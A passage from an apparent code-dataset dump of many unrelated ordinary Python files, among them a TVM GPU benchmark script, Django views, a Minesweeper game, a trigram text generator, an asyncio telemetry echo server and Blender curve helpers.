\"\"\"print progress message\n\n Parameters\n ----------\n msg: str\n The message to print\n \"\"\"\n sys.stdout.write(msg + \"\\r\")\n sys.stdout.flush()\n\n\ndef tune_tasks(\n tasks,\n measure_option,\n tuner=\"xgb\",\n n_trial=1024,\n early_stopping=None,\n log_filename=\"tuning.log\",\n):\n from tvm.autotvm.tuner import XGBTuner\n\n tmp_log_file = log_filename + \".tmp\"\n\n for i, tsk in enumerate(reversed(tasks)):\n print(\"Task: \", tsk)\n prefix = \"[Task %2d/%2d] \" % (i + 1, len(tasks))\n\n # create tuner\n if tuner == \"xgb\":\n tuner_obj = XGBTuner(tsk, loss_type=\"reg\")\n elif tuner == \"xgb_knob\":\n tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"knob\")\n elif tuner == \"xgb_itervar\":\n tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"itervar\")\n elif tuner == \"xgb_curve\":\n tuner_obj = XGBTuner(tsk, loss_type=\"reg\", feature_type=\"curve\")\n elif tuner == \"xgb_rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"xgb_rank_knob\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"knob\")\n elif tuner == \"xgb_rank_itervar\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"itervar\")\n elif tuner == \"xgb_rank_curve\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\", feature_type=\"curve\")\n elif tuner == \"xgb_rank_binary\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\")\n elif tuner == \"xgb_rank_binary_knob\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"knob\")\n elif tuner == \"xgb_rank_binary_itervar\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"itervar\")\n elif tuner == \"xgb_rank_binary_curve\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank-binary\", feature_type=\"curve\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=50)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n autotvm.record.pick_best(tmp_log_file, log_filename)\n\n\ndef evaluate_network(network, target, target_host, dtype, repeat):\n print_progress(network)\n net, params, input_shape, output_shape = get_network(network, batch_size=1, dtype=dtype)\n\n # Auto Tuning\n tune_log = \"adreno-\" + network + \"-\" + dtype + \".log\"\n tuning_options = {\n \"log_filename\": tune_log,\n \"early_stopping\": None,\n \"measure_option\": autotvm.measure_option(\n builder=autotvm.LocalBuilder(build_func=ndk.create_shared, timeout=15),\n runner=autotvm.RPCRunner(\n args.rpc_key,\n host=args.host,\n port=args.port,\n number=3,\n timeout=600,\n ),\n ),\n }\n if args.tune:\n tasks = autotvm.task.extract_from_program(\n net, target=target, target_host=target_host, params=params\n )\n tune_tasks(tasks, **tuning_options)\n\n print_progress(\"%-20s building...\" % network)\n\n # Build the tuning log\n if os.path.exists(tune_log):\n with autotvm.apply_history_best(tune_log):\n with tvm.transform.PassContext(opt_level=3):\n lib = relay.build(\n net, target=tvm.target.Target(target, host=target_host), params=params\n )\n else:\n with tvm.transform.PassContext(opt_level=3):\n lib = relay.build(\n net, target=tvm.target.Target(target, host=target_host), params=params\n )\n\n tmp = tempdir()\n\n filename = \"%s.so\" % network\n lib.export_library(tmp.relpath(filename), fcompile=ndk.create_shared)\n\n # upload library and params\n print_progress(\"%-20s uploading...\" % network)\n\n # connect to remote device\n tracker = tvm.rpc.connect_tracker(args.host, args.port)\n remote = tracker.request(args.rpc_key)\n\n dev = remote.device(str(target), 0)\n remote.upload(tmp.relpath(filename))\n\n rlib = remote.load_module(filename)\n module = runtime.GraphModule(rlib[\"default\"](dev))\n data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n module.set_input(\"data\", data_tvm)\n\n # evaluate\n print_progress(\"%-20s evaluating...\" % network)\n ftimer = module.module.time_evaluator(\"run\", dev, number=1, repeat=repeat)\n prof_res = np.array(ftimer().results) * 1000 # multiply 1000 for converting to millisecond\n print(\n \"%-20s %-19s (%s)\"\n % (network + \"-\" + dtype, \"%.2f ms\" % np.mean(prof_res), \"%.2f ms\" % np.std(prof_res))\n )\n return (np.mean(prof_res), np.std(prof_res))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--network\",\n type=str,\n choices=[\n \"resnet-18\",\n \"resnet-34\",\n \"resnet-50\",\n \"vgg-16\",\n \"vgg-19\",\n \"densenet-121\",\n \"inception_v3\",\n \"mobilenet\",\n \"squeezenet_v1.0\",\n \"squeezenet_v1.1\",\n ],\n help=\"The name of neural network\",\n )\n parser.add_argument(\"--host\", type=str, default=\"127.0.0.1\")\n parser.add_argument(\"--port\", type=int, default=9190)\n parser.add_argument(\"--rpc-key\", type=str, default=\"android\")\n parser.add_argument(\"--repeat\", type=int, default=30)\n parser.add_argument(\"--tune\", type=bool, default=False)\n args = parser.parse_args()\n\n if args.network is None:\n networks = [\n \"resnet-18\",\n \"resnet-34\",\n \"resnet-50\",\n \"vgg-16\",\n \"vgg-19\",\n \"densenet-121\",\n \"inception_v3\",\n \"mobilenet\",\n \"squeezenet_v1.0\",\n \"squeezenet_v1.1\",\n ]\n else:\n networks = [args.network]\n\n target = \"opencl -device=adreno\"\n target_host = \"llvm -mtriple=arm64-linux-android\"\n\n print(\"--------------------------------------------------\")\n print(\"%-20s %-20s\" % (\"Network Name\", \"Mean Inference Time (std dev)\"))\n print(\"--------------------------------------------------\")\n\n results = {}\n\n for network in networks:\n ftime = evaluate_network(network, target, target_host, \"float32\", args.repeat)\n results[network + \"-float32\"] = ftime\n ftime = evaluate_network(network, target, target_host, \"float16\", args.repeat)\n results[network + \"-float16\"] = ftime\n\n print(\"----------------------------------------------------------------------\")\n print(\"%-30s %-30s\" % (\"Network Name\", \"Mean Inference Time (std dev)\"))\n print(\"----------------------------------------------------------------------\")\n for key, val in results.items():\n print(\"%-30s %-30s (%s)\" % (key, \"%.2f ms\" % val[0], \"%.2f ms\" % val[1]))\n","sub_path":"apps/benchmark/adreno/adreno_gpu_bench_texture.py","file_name":"adreno_gpu_bench_texture.py","file_ext":"py","file_size_in_byte":10893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"434724088","text":"from django.shortcuts import render\nfrom .models import Service\nfrom images.models import Image\n\n\ndef service_list_view(request, *args, **kwargs):\n my_content = {}\n image = []\n content = Service.objects.all()\n for c in content:\n image.append(Image.objects.filter(content__slug=c))\n my_content[c] = [c, image]\n context = {\n \"content\": my_content,\n }\n return render(request, 'service/list_view.html', context)\n\n\ndef service_detail_view(request, service=None, *args, **kwargs):\n obj = Service.objects.get(slug=service)\n context = {'obj': obj}\n return render(request, 'service/detail_view.html', context)","sub_path":"rahatapply_v0.0.3/src/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535709838","text":"\"\"\"events class\n\nRevision ID: e62e59678494\nRevises: 3ef49dbc89f6\nCreate Date: 2018-11-18 13:28:53.049020\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e62e59678494'\ndown_revision = '3ef49dbc89f6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('date', sa.DateTime(), nullable=True))\n op.add_column('post', sa.Column('time', sa.DateTime(), nullable=True))\n op.add_column('post', sa.Column('title', sa.String(length=25), nullable=True))\n op.add_column('post', sa.Column('venue', sa.String(length=70), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('post', 'venue')\n op.drop_column('post', 'title')\n op.drop_column('post', 'time')\n op.drop_column('post', 'date')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e62e59678494_events_class.py","file_name":"e62e59678494_events_class.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"560151452","text":"from django.test.simple import DjangoTestSuiteRunner\n\nimport unittest\nfrom unittest import TextTestResult\n\nfrom djangae.db.backends.appengine.dbapi import NotSupportedError, CouldBeSupportedError\n\nclass SkipUnsupportedTestResult(TextTestResult):\n\n def addError(self, test, err):\n if err[0] in (NotSupportedError, CouldBeSupportedError):\n self.addExpectedFailure(test, err)\n else:\n super(SkipUnsupportedTestResult, self).addError(test, err)\n\nclass DjangaeTestSuiteRunner(DjangoTestSuiteRunner):\n def run_suite(self, suite, **kwargs):\n return unittest.TextTestRunner(\n verbosity=self.verbosity,\n failfast=self.failfast,\n resultclass=SkipUnsupportedTestResult\n ).run(suite)\n","sub_path":"djangae/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"433346392","text":"import IN104_simulateur as simu\nfrom evaluation import evaluate\nfrom minimax_time import minimax_alphabeta\nfrom time import time\nsimu.GameState.get_children = simu.GameState.findNextStates\nsimu.GameState.evaluate = evaluate\n\nclass MinimaxBrain:\n\n\tdef __init__(self, config=None, rules=None):\n\t\tself.name = \"AII\" # set your AI name here\n\t\tself.depth = 5 # Set the exploration depth here\n\t\tself.time_list = []\n\t\t\n\n\tdef play(self, gameState, timeLimit):\n\t\t#use minimax here to return the next state with higher score\n\t\tT=timeLimit\n\t\tt1=time()\n\t\tstates=gameState.findNextStates()\n\t\tN=len(states)\n\t\tgoodState=states[0]\n\t\tm=-10**10\n\t\tt2=time()\n\t\tT=T-(t2-t1)\n\t\tfor state in states:\n\t\t\tt3=time()\n\t\t\ts=minimax_alphabeta(state,T/N,True)\n\t\t\tN=N-1\n\t\t\tt4=time()\n\t\t\tT=T-(t4-t3)\n\t\t\tif m= 500000:\n bid = 1000\n else:\n raise ValueError\n quo = price // bid\n remain = price % bid\n if remain == 0:\n return quo * bid\n else:\n if close2up:\n return quo * bid + bid\n else:\n return quo * bid\n\n\ndef weight_to_value(port_value, weight):\n value = port_value * weight / 100\n return value\n\n\ndef value_to_shares(value, price):\n return value // price\n\n\ndef weight_to_shares(weight, port_value, price):\n value = weight_to_value(port_value, weight)\n shares = value_to_shares(value, price)\n return shares","sub_path":"utils/stuff.py","file_name":"stuff.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546693008","text":"from unittest import mock\n\nimport pytest\n\nfrom tech_gallery_bot.domain.user import User\nfrom tech_gallery_bot.repositories import UserRepository\nfrom tests.repository.helpers import DotDict\n\nVALID_USER_DICT = DotDict(\n {\n \"id\": \"123456789123456789\",\n \"email\": \"jane@ciandt.com\",\n \"followedTechnologyIds\": [\"python\", \"ruby\", \"kotlin\", \"rust\"],\n \"name\": \"Jane Doe\",\n \"photo\": \"https://server.com/image.png\",\n \"postGooglePlusPreference\": False,\n \"project\": None,\n \"timezoneOffset\": -180,\n }\n)\n\nVALID_USER_DOMAIN = User(\n id_=\"123456789123456789\",\n name=\"Jane Doe\",\n email=\"jane@ciandt.com\",\n photo=\"https://server.com/image.png\",\n)\n\n\n@pytest.mark.parametrize(\"client\", [None, \"\"])\ndef test_user_repository_invalid_init(client):\n with pytest.raises(TypeError):\n UserRepository(client)\n\n\ndef test_user_repository_find_by_email():\n with mock.patch(\"google.cloud.datastore.Client\", autospec=True) as client:\n with mock.patch(\"google.cloud.datastore.query.Query\", autospec=True) as query:\n client.query.return_value = query\n query.fetch.return_value = [VALID_USER_DICT]\n\n user = UserRepository(client).find_by_email(\"jane@ciandt.com\")\n\n client.query.assert_called_once_with(kind=\"TechGalleryUser\")\n query.add_filter.assert_called_once_with(\"email\", \"=\", \"jane@ciandt.com\")\n query.fetch.assert_called_once_with(limit=1)\n\n assert user == VALID_USER_DOMAIN\n\n\ndef test_user_repository_find_by_email_without_results():\n with mock.patch(\"google.cloud.datastore.Client\", autospec=True) as client:\n with mock.patch(\"google.cloud.datastore.query.Query\", autospec=True) as query:\n client.query.return_value = query\n query.fetch.return_value = []\n\n user = UserRepository(client).find_by_email(\"jane@ciandt.com\")\n assert user is None\n","sub_path":"tests/repository/test_user_repository.py","file_name":"test_user_repository.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"80596030","text":"import random\nclass MineSweeperTile:\n covered = True\n marked = False\n isMine = False\n mineNeighbor = 0\n\n def printObjAsDictKey(self):\n if self.marked:\n return 'Marked'\n elif self.covered:\n return 'Covered'\n elif not self.isMine:\n return str(self.mineNeighbor)\n else:\n return 'Mine'\n\n def printObj(self):\n if self.covered:\n printStr = 'Covered;'\n else:\n printStr = 'UnCovered;'\n if self.marked:\n printStr += 'Marked;'\n else:\n printStr += 'UnMarked;'\n if self.isMine:\n printStr += 'Mine'\n else:\n printStr += str(self.mineNeighbor)\n return printStr\n\n def __str__(self):\n return self.printObj()\n\nclass MineSweeperGrid:\n rows = 3\n cols = 2\n numMines = 10\n grid = []\n backupGrid = []\n fail = False\n firstClick = True\n\n def __init__(self, rows=9, cols=9, mines=10):\n self.rows = rows\n self.cols = cols\n self.numMines = mines\n self.mineUnMarked = mines\n for i in range(self.rows):\n self.grid.append([])\n self.backupGrid.append([])\n for j in range(self.cols):\n self.grid[i].append(MineSweeperTile())\n self.backupGrid[i].append(MineSweeperTile())\n\n def revert(self):\n a = self.grid\n self.grid = self.backupGrid\n self.backupGrid = a\n\n def makeBackup(self):\n if not self.fail:\n for i in range(self.rows):\n for j in range(self.cols):\n self.backupGrid[i][j].covered = self.grid[i][j].covered\n self.backupGrid[i][j].marked = self.grid[i][j].marked\n self.backupGrid[i][j].isMine = self.grid[i][j].isMine\n self.backupGrid[i][j].mineNeighbor = self.grid[i][j].mineNeighbor\n\n\n def cellNeighbors(self, x, y):\n neighbors = []\n for i in (x - 1, x, x + 1):\n for j in (y - 1, y, y + 1):\n if not (i == x and j == y) and i >= 0 and i < self.rows and j >= 0 and j < self.cols:\n neighbors.append((i, j))\n return neighbors\n\n #init the grid with mines after the first click, the first click point can not be a mine\n def initGrid(self, x, y):\n minePlanted = 0\n while minePlanted < self.numMines:\n rX = random.randint(0, self.rows - 1)\n rY = random.randint(0, self.cols - 1)\n if not (rX == x and rY == y) and self.grid[rX][rY].isMine == False:\n self.grid[rX][rY].isMine = True\n minePlanted += 1\n for i in range(self.rows):\n for j in range(self.cols):\n mines = 0\n for (r,c) in self.cellNeighbors(i, j):\n if self.grid[r][c].isMine:\n mines += 1\n self.grid[i][j].mineNeighbor = mines\n\n def openNoMineTile(self, x, y):\n if self.grid[x][y].covered == False:\n return\n self.grid[x][y].covered = False\n if self.grid[x][y].mineNeighbor == 0:\n for (r,c) in self.cellNeighbors(x, y):\n self.openNoMineTile(r, c)\n\n def openAllMineTiles(self):\n for i in range(self.rows):\n for j in range(self.cols):\n if self.grid[i][j].isMine:\n self.grid[i][j].covered = False\n self.grid[i][j].marked = False\n\n def openTile(self, x, y):\n if self.grid[x][y].marked:\n return\n if self.grid[x][y].isMine:\n self.fail = True\n self.openAllMineTiles() # game over, lost, reveal all mines\n return\n else:\n self.openNoMineTile(x, y)\n\n def openFirstTile(self, x, y):\n self.firstClick = False\n self.initGrid(x, y)\n self.openTile(x, y)\n\n def openMultiTile(self,x,y):\n if self.grid[x][y].covered or self.grid[x][y].marked:\n return\n neighbors = self.cellNeighbors(x,y)\n mark = 0\n for (r,c) in neighbors:\n if self.grid[r][c].marked:\n mark += 1\n if mark == self.grid[x][y].mineNeighbor:\n for (r,c) in neighbors:\n if not self.grid[r][c].marked and self.grid[r][c].covered:\n self.openTile(r, c)\n\n def success(self):\n if self.firstClick:\n return False #hav't even started\n for i in range(self.rows):\n for j in range(self.cols):\n if self.grid[i][j].marked != self.grid[i][j].isMine:\n return False\n if self.grid[i][j].covered and not self.grid[i][j].isMine:\n return False\n print('Success')\n return True\n\n def gridIndexToCoord(self, row, col, width, height, margin):\n return (col*(width+margin)+margin, row*(height+margin)+margin)\n\n def coordToGridIndex(self, x, y, width, height, margin):\n return((int) ((y-margin)/(margin + height )),(int) ((x-margin)/(margin + width)) )\n","sub_path":"MineSweeperClass.py","file_name":"MineSweeperClass.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"150268033","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/aha/controller/tests/test_controller.py\n# Compiled at: 2010-10-20 22:45:56\nfrom unittest import TestCase\nimport logging\nlog = logging.getLogger(__name__)\nfrom nose.tools import *\nfrom coregae.controller.formcontrol import FormControl, handle_state, validate\nFC = FormControl\n\nclass TestCRUDControllerMixIn(TestCase):\n\n def test_subclass(self):\n \"\"\"\n Test for subclassing CRUDControllerMixIn\n \"\"\"\n from coregae.controller.crudcontrollers import CRUDControllerMixIn, CRUDControllerMetaClass\n\n class TestKlass(CRUDControllerMixIn):\n EDIT_FC = FormControl()\n ADD_FC = FormControl()\n\n @EDIT_FC.handle_state(FC.SUCCESS)\n def edit_data(self):\n return 'FOO'\n\n @EDIT_FC.handle_validate(FC.INITIAL)\n def edit_validate(self):\n pass\n\n @ADD_FC.handle_state(FC.INITIAL)\n def add_form(self):\n return 'FOO'\n\n assert_true(hasattr(TestKlass, 'EDIT_FC'))\n assert_true(hasattr(TestKlass, 'ADD_FC'))\n assert_not_equal(TestKlass.EDIT_FC, CRUDControllerMixIn.EDIT_FC)\n efc = TestKlass.EDIT_FC\n efc2 = CRUDControllerMixIn.EDIT_FC\n assert_equal(efc.get_processor(FC.INITIAL), efc2.get_processor(FC.INITIAL))\n assert_not_equal(efc.get_processor(FC.SUCCESS), efc2.get_processor(FC.SUCCESS))\n assert_not_equal(efc.get_validator(FC.INITIAL), efc2.get_validator(FC.INITIAL))\n afc = TestKlass.ADD_FC\n afc2 = CRUDControllerMixIn.ADD_FC\n assert_not_equal(afc.get_processor(FC.INITIAL), afc2.get_processor(FC.INITIAL))","sub_path":"pycfiles/aha-0.85adev-py2.5/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7711992","text":"import asyncio\nimport datetime\nimport re\n\nmess = '$CZ^LBV5S3106ESJ03738^12980102012051|30:14.2^31:0859^32:000^33:014^34:010^35:090^36:01.24^37:09.07^38:0003.49^39:0028477^3A:00.62^3B:005^3C:000^3D:000^3E:000^3F:000|V:127'\nclass EchoServer(asyncio.Protocol):\n def connection_made(self, transport):\n peername = transport.get_extra_info('peername')\n print('客户端 {} 已连接.'.format(peername))\n self.transport = transport\n\n def data_received(self, data):\n data1 = re.split(r'[\\^\\:\\s]\\s*',data.decode('utf-8'))\n if '31' in data1 and '32' in data1 and '33' in data1 and '39' in data1:\n print('总里程:{}Km'.format(data1[21]))\n elif '61' in data1 and '62' in data1:\n print('GPS坐标:{},{}'.format(data1[5],data1[3]))\n else:\n pass\n # print('{} 已收数据: {}'.format(datetime.datetime.now(),data.decode('utf-8')))\n data2 = re.split(r'[\\^\\:\\|\\s]\\s*',data.decode('utf-8'))\n # print(data2)\n if '10' in data2 and '05' in data2:\n if '02' == data2[4]:\n print('车辆熄火')\n if '01' == data2[4]:\n print('车辆启动')\n if '20' in data2 and '21' in data2 and '22' in data2:\n if float(data2[6]) < 11:\n print('掉电报警')\n if '30' in data2 and '31' in data2 and '32' in data2:\n if float(data2[4]) < 11:\n print('掉电报警')\n\n self.transport.write(data)\n\n if data == b'exit':\n self.transport.close()\n print('transport已关闭')\n\n def connection_lost(self,*args):\n print('客户端退出链接.')\n\n\nloop = asyncio.get_event_loop()\ncoro = loop.create_server(EchoServer, '0.0.0.0', 8221)\nserver = loop.run_until_complete(coro)\n\nprint('serving on {}'.format(server.sockets[0].getsockname()))\n\ntry:\n loop.run_forever()\nexcept KeyboardInterrupt:\n print(\"exit\")\nfinally:\n server.close()\n loop.close()","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"284167029","text":"import random\n\ndef main():\n # set file names and initialize sequences\n input_file = \"sherlock.txt\"\n output_file = input_file[:-4]+\"_out.txt\"\n words = []\n trigrams = {}\n story_string = \"\"\n\n # open input file and read words into words list\n with open(input_file, 'r') as f:\n for line in f:\n for word in line.strip().split():\n words.append(word)\n\n # process trigrams and save to trigrams dict\n # key = words[i] + ' ' + words[i+1]\n # value = list of existing words[i+1] for a given key\n for i in range(len(words)-2):\n tri = words[i]+' '+words[i+1]\n if tri not in trigrams.keys():\n trigrams[tri] = []\n trigrams[tri].append(words[i+2])\n\n # start story as random choice of a trigram from trigrams dict\n story = random.choice(list(trigrams.keys())).split()\n i = 0\n\n # create story based on trigram processing\n # key = story[i] + ' ' + story[i+1]\n # value = random choice from list of possible values => story[i+2]\n while True:\n key = story[i]+' '+story[i+1]\n if key in trigrams.keys():\n story.append(random.choice(trigrams[key]))\n i += 1\n else:\n break\n\n # convert story list to string\n for word in story:\n story_string += ' '+word\n story_string = story_string.lstrip()\n\n # save story to output file\n with open(output_file, 'w') as f:\n f.write(story_string)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/cocokaku/lesson4/kata_fourteen.py","file_name":"kata_fourteen.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511228978","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipaySecurityProdFingerprintDeviceVerifyModel(object):\n\n def __init__(self):\n self._ifaa_version = None\n self._ifaf_message = None\n self._out_biz_no = None\n\n @property\n def ifaa_version(self):\n return self._ifaa_version\n\n @ifaa_version.setter\n def ifaa_version(self, value):\n self._ifaa_version = value\n @property\n def ifaf_message(self):\n return self._ifaf_message\n\n @ifaf_message.setter\n def ifaf_message(self, value):\n self._ifaf_message = value\n @property\n def out_biz_no(self):\n return self._out_biz_no\n\n @out_biz_no.setter\n def out_biz_no(self, value):\n self._out_biz_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.ifaa_version:\n if hasattr(self.ifaa_version, 'to_alipay_dict'):\n params['ifaa_version'] = self.ifaa_version.to_alipay_dict()\n else:\n params['ifaa_version'] = self.ifaa_version\n if self.ifaf_message:\n if hasattr(self.ifaf_message, 'to_alipay_dict'):\n params['ifaf_message'] = self.ifaf_message.to_alipay_dict()\n else:\n params['ifaf_message'] = self.ifaf_message\n if self.out_biz_no:\n if hasattr(self.out_biz_no, 'to_alipay_dict'):\n params['out_biz_no'] = self.out_biz_no.to_alipay_dict()\n else:\n params['out_biz_no'] = self.out_biz_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipaySecurityProdFingerprintDeviceVerifyModel()\n if 'ifaa_version' in d:\n o.ifaa_version = d['ifaa_version']\n if 'ifaf_message' in d:\n o.ifaf_message = d['ifaf_message']\n if 'out_biz_no' in d:\n o.out_biz_no = d['out_biz_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipaySecurityProdFingerprintDeviceVerifyModel.py","file_name":"AlipaySecurityProdFingerprintDeviceVerifyModel.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"439177558","text":"\ndef calculate_pi(n_terms):\n\t\"\"\" calculating pi using Leibniz formula:\n\t\tpi = 4/1 - 4/3 + 4/5 - 4/7 + 4/9 - 4/11 ...\n\t\"\"\"\n\tnumerator = 4.0\n\tdenominator = 1.0\n\toperation = 1.0\n\tpi = 0.0\n\n\tfor _ in range(n_terms):\n\t\tpi += operation * (numerator / denominator)\n\t\tdenominator += 2.0\n\t\toperation *= - 1.0\n\treturn pi\n\nif __name__ == '__main__':\n\tprint(calculate_pi(1000000))","sub_path":"ClassicProblemsPy/calculating_pi.py","file_name":"calculating_pi.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"151935857","text":"from django.contrib import admin\n\n# Register your models here.\nfrom home.models import Settings, ContactFormMessage\n\n\nclass ContactFromMessageAdmin(admin.ModelAdmin):\n list_display = ['name','email','subject','message','note','status']\n list_filter = ['status']\n\nadmin.site.register(ContactFormMessage, ContactFromMessageAdmin)\nadmin.site.register(Settings)\n\n\n# burda kaldiim\n\n\n\n","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"341673052","text":"import bpy\nimport hashlib\nimport math\nfrom array import array\n\n\ndef r(x, y, center=None):\n center_x, center_y = center or (0, 0)\n math.sqrt(math.pow(center_x - x, 2) + math.pow(center_y - y, 2))\n\n\ndef theta(x, y, center=None):\n center_x, center_y = center or (0, 0)\n math.atan2(center_y - y, center_x - x)\n\n\ndef polar_to_xy(r, theta):\n return r * math.cos(theta), r * math.sin(theta)\n\n\nclass Lockable:\n def lock(self):\n self[\"lock\"] = True\n\n def unlock(self):\n del self[\"lock\"]\n\n\ndef if_unlocked(func):\n def _if_unlocked(self, context):\n if not self.get(\"lock\", False):\n func(self, context)\n\n return _if_unlocked\n\n\ndef hash_curve(hash_algo, curve: bpy.types.Curve):\n spline: bpy.types.Spline\n point: bpy.types.SplinePoint\n bezier_point: bpy.types.BezierSplinePoint\n\n hash_algo.update(array(\"l\", [curve.resolution_u, curve.resolution_v]))\n hash_algo.update(bytes(curve.dimensions, \"ascii\"))\n for spline in curve.splines:\n hash_algo.update(bytes(spline.type, \"ascii\"))\n hash_algo.update(bytes(spline.radius_interpolation, \"ascii\"))\n hash_algo.update(bytes(spline.tilt_interpolation, \"ascii\"))\n hash_algo.update(array(\"l\", [\n spline.order_u, spline.order_v, spline.resolution_u,\n spline.resolution_v, spline.use_bezier_u,\n spline.use_bezier_v, spline.use_cyclic_u, spline.use_cyclic_v,\n spline.use_endpoint_u, spline.use_endpoint_v, spline.use_smooth]))\n for bezier_point in spline.bezier_points:\n hash_algo.update(array(\"d\", bezier_point.co))\n hash_algo.update(array(\"d\", bezier_point.handle_left))\n hash_algo.update(array(\"d\", bezier_point.handle_right))\n hash_algo.update(bytes(bezier_point.handle_right_type, \"ascii\"))\n hash_algo.update(bytes(bezier_point.handle_left_type, \"ascii\"))\n for point in spline.points:\n hash_algo.update(array(\"d\", point.co))\n hash_algo.update(array(\"d\", [point.tilt, point.weight]))\n\n\ndef copy_curve(to_curve: bpy.types.Curve, from_curve: bpy.types.Curve):\n from_spline: bpy.types.Spline\n from_point: bpy.types.SplinePoint\n from_bezier_point: bpy.types.BezierSplinePoint\n\n if len(to_curve.splines) > 0:\n to_curve.splines.clear()\n\n to_curve.dimensions = from_curve.dimensions\n to_curve.resolution_u = from_curve.resolution_u\n to_curve.resolution_v = from_curve.resolution_v\n\n for from_spline in from_curve.splines:\n to_spline: bpy.types.Spline = to_curve.splines.new(from_spline.type)\n if to_spline.type == \"BEZIER\":\n to_spline.bezier_points.add(len(from_spline.bezier_points) - 1)\n for i, from_bezier_point in enumerate(from_spline.bezier_points):\n to_spline.bezier_points[i].co = from_bezier_point.co\n to_spline.bezier_points[i].handle_left_type = from_bezier_point.handle_left_type\n to_spline.bezier_points[i].handle_left = from_bezier_point.handle_left\n to_spline.bezier_points[i].handle_right_type = from_bezier_point.handle_right_type\n to_spline.bezier_points[i].handle_right = from_bezier_point.handle_right\n to_spline.bezier_points[i].hide = from_bezier_point.hide\n to_spline.bezier_points[i].radius = from_bezier_point.radius\n to_spline.bezier_points[i].select_control_point = from_bezier_point.select_control_point\n to_spline.bezier_points[i].select_left_handle = from_bezier_point.select_left_handle\n to_spline.bezier_points[i].select_right_handle = from_bezier_point.select_right_handle\n to_spline.bezier_points[i].tilt = from_bezier_point.tilt\n to_spline.bezier_points[i].weight_softbody = from_bezier_point.weight_softbody\n else:\n to_spline.points.add(len(from_spline.points) - 1)\n for i, from_point in enumerate(from_spline.points):\n to_spline.points[i].co = from_point.co\n to_spline.points[i].hide = from_point.hide\n to_spline.points[i].tilt = from_point.tilt\n to_spline.points[i].weight = from_point.weight\n\n to_spline.hide = from_spline.hide\n to_spline.order_u = from_spline.order_u\n to_spline.order_v = from_spline.order_v\n to_spline.radius_interpolation = from_spline.radius_interpolation\n to_spline.resolution_u = from_spline.resolution_u\n to_spline.resolution_v = from_spline.resolution_v\n to_spline.tilt_interpolation = from_spline.tilt_interpolation\n 